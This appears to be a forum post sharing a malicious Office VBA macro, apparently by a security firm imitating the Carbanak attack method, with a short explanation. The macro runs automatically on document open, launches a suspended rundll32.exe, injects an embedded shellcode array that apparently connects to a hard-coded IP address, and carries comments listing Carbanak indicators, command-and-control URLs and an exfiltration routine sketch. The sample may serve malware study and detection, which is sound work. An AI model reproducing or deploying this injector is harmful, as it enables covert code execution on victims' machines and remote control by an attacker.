Kind of. This is from security company Outflank (see last document editor) playing around with Carbanak attack method.
Code: Select allPrivate Type PROCESS_INFORMATION
hProcess As Long
hThread As Long
dwProcessId As Long
dwThreadId As Long
End Type
Private Type STARTUPINFO
cb As Long
lpReserved As String
lpDesktop As String
lpTitle As String
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As Long
hStdInput As Long
hStdOutput As Long
hStdError As Long
End Type
#If VBA7 Then
Private Declare PtrSafe Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As LongPtr
Private Declare PtrSafe Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As LongPtr, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As LongPtr) As LongPtr
Private Declare PtrSafe Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
#Else
Private Declare Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As Long
Private Declare Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As Long, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As Long) As Long
Private Declare Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
#End If
Sub Auto_Open()
Dim myByte As Long, myArray As Variant, offset As Long
Dim pInfo As PROCESS_INFORMATION
Dim sInfo As STARTUPINFO
Dim sNull As String
Dim sProc As String
#If VBA7 Then
Dim rwxpage As LongPtr, res As LongPtr
#Else
Dim rwxpage As Long, res As Long
#End If
myArray = Array(-4, -24, -119, 0, 0, 0, 96, -119, -27, 49, -46, 100, -117, 82, 48, -117, 82, 12, -117, 82, 20, -117, 114, 40, 15, -73, 74, 38, 49, -1, 49, -64, -84, 60, 97, 124, 2, 44, 32, -63, -49, _
13, 1, -57, -30, -16, 82, 87, -117, 82, 16, -117, 66, 60, 1, -48, -117, 64, 120, -123, -64, 116, 74, 1, -48, 80, -117, 72, 24, -117, 88, 32, 1, -45, -29, 60, 73, -117, 52, -117, 1, _
-42, 49, -1, 49, -64, -84, -63, -49, 13, 1, -57, 56, -32, 117, -12, 3, 125, -8, 59, 125, 36, 117, -30, 88, -117, 88, 36, 1, -45, 102, -117, 12, 75, -117, 88, 28, 1, -45, -117, 4, _
-117, 1, -48, -119, 68, 36, 36, 91, 91, 97, 89, 90, 81, -1, -32, 88, 95, 90, -117, 18, -21, -122, 93, 104, 110, 101, 116, 0, 104, 119, 105, 110, 105, 84, 104, 76, 119, 38, 7, -1, _
-43, 49, -1, 87, 87, 87, 87, 87, 104, 58, 86, 121, -89, -1, -43, -23, -124, 0, 0, 0, 91, 49, -55, 81, 81, 106, 3, 81, 81, 104, 80, 0, 0, 0, 83, 80, 104, 87, -119, -97, _
-58, -1, -43, -21, 112, 91, 49, -46, 82, 104, 0, 2, 96, -124, 82, 82, 82, 83, 82, 80, 104, -21, 85, 46, 59, -1, -43, -119, -58, -125, -61, 80, 49, -1, 87, 87, 106, -1, 83, 86, _
104, 45, 6, 24, 123, -1, -43, -123, -64, 15, -124, -61, 1, 0, 0, 49, -1, -123, -10, 116, 4, -119, -7, -21, 9, 104, -86, -59, -30, 93, -1, -43, -119, -63, 104, 69, 33, 94, 49, -1, _
-43, 49, -1, 87, 106, 7, 81, 86, 80, 104, -73, 87, -32, 11, -1, -43, -65, 0, 47, 0, 0, 57, -57, 116, -73, 49, -1, -23, -111, 1, 0, 0, -23, -55, 1, 0, 0, -24, -117, -1, _
-1, -1, 47, 97, 85, 49, 117, 0, 126, 55, -62, -35, 87, 76, 64, 6, 125, -33, -120, 77, -58, 36, -115, -103, 104, -115, 62, 88, 103, -94, 123, 1, 4, 37, 35, -51, -79, 33, 57, -83, _
8, -43, 17, 18, 72, -47, -32, 108, -56, -75, 11, 58, -35, 119, -6, -67, 19, -34, -28, 11, -118, -106, 68, 85, 40, -105, 85, 10, 40, -55, -60, 13, 17, -23, 40, 76, -66, -93, -62, 93, _
116, 0, 85, 115, 101, 114, 45, 65, 103, 101, 110, 116, 58, 32, 77, 111, 122, 105, 108, 108, 97, 47, 53, 46, 48, 32, 40, 99, 111, 109, 112, 97, 116, 105, 98, 108, 101, 44, 32, 77, _
83, 73, 69, 32, 49, 49, 44, 32, 87, 105, 110, 100, 111, 119, 115, 32, 78, 84, 32, 54, 46, 51, 59, 32, 84, 114, 105, 100, 101, 110, 116, 47, 55, 46, 48, 59, 32, 32, 114, 118, _
58, 49, 49, 46, 48, 41, 32, 108, 105, 107, 101, 32, 71, 101, 99, 107, 111, 13, 10, 0, -45, -41, -69, 3, -121, -109, -85, 121, -29, -35, -39, 86, 77, -93, -93, -51, 96, 117, -90, -105, _
-53, 74, -3, -45, -123, -104, 62, -3, 107, 107, -85, -62, -99, -62, -76, 31, 46, 62, 44, -68, 39, -11, 74, -37, -93, 109, -35, 40, -16, 94, 53, -45, 63, -104, -61, 121, -45, 22, 59, 124, _
-108, -84, -124, 11, -72, -70, -20, 27, 75, 74, 39, -108, 106, -118, -26, 33, -16, -5, 1, 106, -114, 91, -46, 30, -100, 44, 71, 52, -85, -98, -32, -17, -59, -84, 3, -74, 112, 63, 92, 61, _
-112, 66, -35, -37, 125, 83, -16, 81, 29, -18, 83, -76, 79, 60, -43, -123, -8, 74, -38, -2, -126, 61, 74, -107, -99, -51, 115, 107, 14, -54, 68, -125, -31, -127, -48, 65, -104, -5, -96, -14, _
76, 15, -4, -18, -75, 66, -7, -27, -122, -126, -27, 31, -105, -92, 89, -86, 82, -95, -68, -20, -74, -74, 62, 118, -42, 99, 73, -92, 39, 47, -72, 43, 26, 17, -71, 6, -94, 79, -34, -85, _
5, -70, -18, -107, 80, 104, -126, 63, -13, 119, 92, -94, 8, -11, -59, 27, -65, -13, -22, -5, 78, -53, 45, -29, 96, 0, 104, -16, -75, -94, 86, -1, -43, 106, 64, 104, 0, 16, 0, 0, _
104, 0, 0, 64, 0, 87, 104, 88, -92, 83, -27, -1, -43, -109, -71, 0, 0, 0, 0, 1, -39, 81, 83, -119, -25, 87, 104, 0, 32, 0, 0, 83, 86, 104, 18, -106, -119, -30, -1, -43, _
-123, -64, 116, -58, -117, 7, 1, -61, -123, -64, 117, -27, 88, -61, -24, -87, -3, -1, -1, 49, 54, 53, 46, 50, 50, 46, 55, 49, 46, 52, 50, 0, 18, 33, 93, 127)
If Len(Environ("ProgramW6432")) > 0 Then
sProc = Environ("windir") & "\\SysWOW64\\rundll32.exe"
Else
sProc = Environ("windir") & "\\System32\\rundll32.exe"
End If
res = RunStuff(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)
rwxpage = AllocStuff(pInfo.hProcess, 0, UBound(myArray), &H1000, &H40)
For offset = LBound(myArray) To UBound(myArray)
myByte = myArray(offset)
res = WriteStuff(pInfo.hProcess, rwxpage + offset, myByte, 1, ByVal 0&)
Next offset
res = CreateStuff(pInfo.hProcess, 0, 0, rwxpage, 0, 0, 0)
'def pjw_hash(s):
' ctr = 0
' for i in range(len(s)):
' ctr = 0xffffffff & ((ctr << 4) + ord(s[i]))
' if ctr & 0xf0000000:
' ctr = (((ctr & 0xf0000000) >> 24) ^ ctr) & 0x0fffffff
'
'
'
' return ctr
' 4116ec1eb75cf336a3fdde253c28f712668d0a325a74c41445c7fa87c4e9b7a5
' 2549f116adbbfeeecf7596e6381bb43c
' 8a12453015658a505dd6f473de7a881900d8a769
' RAR archive data, v1d, os: Win32
' 52 61 72 21 1A 07 00
' 52 61 72 21 1A 07 01 00
' 783b2eefdb90eb78cfda475073422ee86476aca65d67ff2c9cf6a6f9067ba5fa
' 06efd1354b7418198c66a78ff3e68e59
' 666c0ef12715e0d554ff4080ccdc6af8898cbc65
' \bot.dll
' \botep\.gitignore
' application/x-rar-compressed
' DNS_TXT
' TEXTMATE
' POWERSOURCE
' Intel\58d2a83f7778d5.36783181.vbs
' Intel\58d2a83f777942.26535794.ps1
' Intel\58d2a83f777908.23270411.vbs
' 58d2a83f7778d5.36783181.vbs
' 58d2a83f777942.26535794.ps1
' stage.14919005.www1.proslr3.com
' aaa.stage.14919005.www1.proslr3.com
' \Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f777638.60220156.ini
' \Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f777688.78384945.ps1
' \Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f7776b5.64953395.txt
' \Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f7776e0.72726761.vbs
' \Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f777716.48248237.vbs
' \Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f777788.86541308.vbs
' \Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\Foxconn.lnk
' mshta.exe
' http://198.100.119.6:80/cd
' http://198.100.119.6:443/cd
' http://198.100.119.6:8080/cd
'Function send_data(data)
' random_string = custom_function_to_generate_random_string()
' encoded_data = URLEncode(SimpleEncrypt(data))
' post_data("POST”, random_string & "=" & encoded_data, Hard_coded_c2_url,
'Create_Random_Url(class_id))
'Version: 0
'NetBIOS Name: andy -pc
'Droid volume identifier: e2c10c40-6f7d-4442-bcec-470c96730bca
'Droid file identifier: a6eea972-0e2f-11e7-8b2d-0800273d5268
'Birth droid volume identifier: e2c10c40-6f7d-4442-bcec-470c96730bca
'Birth droid file identifier: a6eea972-0e2f-11e7-8b2d-0800273d5268
'MAC address: 08:00:27:3d:52:68
'UUID timestamp: 03/21/2017 (12:12:28.500) [UTC]
'UUID sequence number: 2861
' 6a5a42ed234910121dbb7d1994ab5a5e
' 1a9e113b2f3caa7a141a94c8bc187ea7
' C:\Windows\AppPatch\Custom
' C:\Windows\AppPatch\Custom\Custom64
' \REGISTRY\MACHINE\SOFTWARE\Microsoft\DRM
' ScRegisterTCPEndpoint
' 0x0001407c
' HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom
' HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB
' sdbinst.exe
' ????
' ??????
' ?????
' ??????
' ????
' ??????
' ??????
' ???????
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
Code is self explaining, creates a suspended rundll32.exe process and injects a small shellcode before continuing execution. You can also see the references to the Carbanak source code archive (2549f116adbbfeeecf7596e6381bb43c).
Sample attached.
